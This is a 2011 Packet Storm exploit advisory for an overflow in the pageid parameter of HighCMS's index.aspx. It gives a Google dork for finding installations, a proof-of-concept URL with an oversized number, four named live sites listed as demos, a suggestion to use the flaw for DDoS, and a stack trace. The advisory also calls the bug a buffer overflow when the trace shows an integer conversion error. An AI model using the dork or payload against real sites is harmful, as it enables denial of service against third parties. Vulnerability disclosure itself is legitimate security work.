HighCMS suffers from an overflow vulnerability when handling the pageid variable.
93744a6c8c3f2e97056286c6fb6d441ee2dd84ef4497dc29022027a1079223e9----------------------------------------------------------------
HighCMS <= (index.aspx) Buffer Overflow Vulnerability
----------------------------------------------------------------
# Exploit Title:HighCMS <= (index.aspx) Buffer Overflow Vulnerability
# Google Dork: inurl:index.aspx?siteid=1&pageid=
# Application Name: [HighCMS]
# Date: 2011-10-30
# Author: BHG Security Center
# Home: Http://black-hg.org
# Software Link: [ http://www.aryanic.com/products-highcms.html ]
# Vendor Response(s): They didn't respond to the emails.
# Version: [ 11.6 ]
# Impact : [ Low ]
# Tested on: [Windows Server 2003 /IIS 6.0]
# CVE : Webapps
+-----------------------+
| Overflow Exception |
+-----------------------+
Description: You can use many of these vulnerabilities do Ddos attacks, including refref
# PoC(s):
http://[HOST]/index.aspx?siteid=1&pageid=[Overflow]
http://[HOST]/index.aspx?siteid=1&pageid=4141414141 <> True
# Demo(s):
http://www.mayadin.biz/index.aspx?siteid=1&pageid=4141414141
http://ielts-house.com/index.aspx?siteid=1&pageid=4141414141
http://www.persiangoldfish.com/index.aspx?siteid=1&pageid=414141414141
http://honarnews.org/index.aspx?siteid=1&pageid=4141414141
# Output Data:
[OverflowException: Arithmetic operation resulted in an overflow.]
Microsoft.VisualBasic.CompilerServices.Conversions.ToInteger(String Value) +165
highcms.index.page_select() +1272
highcms.index.make_page() +2304
highcms.index.Page_Load(Object , EventArgs ) +8725
System.Web.UI.Control.OnLoad(EventArgs e) +132
System.Web.UI.Control.LoadRecursive() +66
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +2428
# Reference:
[1] For more information about this vulnerability (URL: http://msdn.microsoft.com/en-us/library/system.overflowexception.aspx)
[2] For more information about this vulnerability (URL: https://www.owasp.org/index.php/Buffer_Overflows)
# Important Notes:
- Vendor did not respond to the email as well as the phone. As there is not any contact form or email address in the website, we have used all the emails which had been found by searching in Google such as support, info, and so on.
# Greets To :
Net.Edit0r ~ A.Cr0x ~ 3H34N ~ 4m!n ~ Cyrus ~ tHe.k!ll3r ~ 2MzRp
ArYaIeIrAn ~ Mikili ~ NoL1m1t ~ cmaxx ~ G3n3Rall ~ Mr.XHat ~ cmaxx
G3n3Rall ~ Mr.XHat ~ M4hd1 ~ Cru3l.b0y ~ HUrr!c4nE ~ r3v0lter
s3cure.p0rt ~ THANKS TO ALL Iranian HackerZ ./Persian Gulf
===========================================[End]=============================================
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed